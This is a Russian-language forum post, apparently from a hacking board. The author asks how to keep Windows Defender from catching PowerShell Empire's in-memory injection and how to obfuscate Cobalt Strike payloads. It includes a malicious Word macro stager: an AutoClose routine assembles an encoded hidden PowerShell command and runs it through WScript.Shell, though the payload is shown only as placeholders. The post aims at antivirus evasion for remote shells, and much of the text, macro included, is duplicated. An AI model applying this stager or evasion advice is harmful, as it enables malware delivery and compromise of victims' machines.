Довольно плохо разбираюсь в том,как работают АВ,но я думаю шарящим не составит труда ответить на мой вопрос:
Есть powershell-empire,юзаю windows/macro как stager , AMSIBypass AMSIBypass2,Base64 выставляю на True,выходит примерно следующее:
Защитник (Windows 10 последнее обновление) не палит данный повершелл скрипт,если он у меня на рабочем столе,даже просканив его он говорит что вирусов нет,когда я заливаю этот макрос в WORD и сохраняю,сканирование тоже ничего не показывает,но когда макрос выполняется,защитник думает секунд 5 и выдает угрозу,и собственно шелл я не получаю (делал все на локалке)
На Windows 7 все куда лучше,защитник полностью позволяет этому скрипту делать что угодно,не палит его и инжект в память,шелл я получаю успешно
У меня два вопроса:
1. Как не спалиться во время инжекта Empire в память?
2. Что за способ обфускации применяет Empire? Я знаю,что это построчное выполнение команд + Base64 + небольшая обфускация,но как мне сделать так же например с Cobalt Strike'ом? т.к там этой фичи нету
Есть powershell-empire,юзаю windows/macro как stager , AMSIBypass AMSIBypass2,Base64 выставляю на True,выходит примерно следующее:
Sub AutoClose()
ZAAIR
End Sub
Public Function ZAAIR() As Variant
Dim mb As String
mb = "powershell -noP -sta -w 1 -enc base64 текст"
mb = mb + "base64 текст"
mb = mb + "base64 текст"
mb = mb + "base64 текст"
mb = mb + "base64 текст"
mb = mb + "base64 текст"
mb = mb + base64 текст"
mb = mb + "base64 текст"
...
mb = mb + "base64 текст="
Set asd = CreateObject("WScript.Shell")
asd.Run(mb)
End Function
ZAAIR
End Sub
Public Function ZAAIR() As Variant
Dim mb As String
mb = "powershell -noP -sta -w 1 -enc base64 текст"
mb = mb + "base64 текст"
mb = mb + "base64 текст"
mb = mb + "base64 текст"
mb = mb + "base64 текст"
mb = mb + "base64 текст"
mb = mb + base64 текст"
mb = mb + "base64 текст"
...
mb = mb + "base64 текст="
Set asd = CreateObject("WScript.Shell")
asd.Run(mb)
End Function
На Windows 7 все куда лучше,защитник полностью позволяет этому скрипту делать что угодно,не палит его и инжект в память,шелл я получаю успешно
У меня два вопроса:
1. Как не спалиться во время инжекта Empire в память?
2. Что за способ обфускации применяет Empire? Я знаю,что это построчное выполнение команд + Base64 + небольшая обфускация,но как мне сделать так же например с Cobalt Strike'ом? т.к там этой фичи нету